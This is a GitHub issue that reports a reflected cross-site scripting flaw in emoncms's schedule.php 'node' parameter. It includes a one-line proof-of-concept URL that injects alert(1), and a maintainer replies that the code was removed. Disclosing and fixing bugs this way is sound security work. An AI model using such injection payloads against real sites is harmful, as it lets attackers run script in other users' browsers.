Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hi,
I have found a XSS in vulnerability in: emoncms/Modules/input/Views/schedule.php using the parameter 'node'
Proof of concept exploit: http://127.0.0.1:9000/Modules/input/Views/schedule.php?node=1%22;alert(1);var%20x=%22l
The text was updated successfully, but these errors were encountered:
Thanks @fschuckert and sorry for the delay.I've now removed this unused code: ac0f091
Sorry, something went wrong.
No branches or pull requests
Hi,
I have found a XSS in vulnerability in: emoncms/Modules/input/Views/schedule.php using the parameter 'node'
Proof of concept exploit: http://127.0.0.1:9000/Modules/input/Views/schedule.php?node=1%22;alert(1);var%20x=%22l
The text was updated successfully, but these errors were encountered: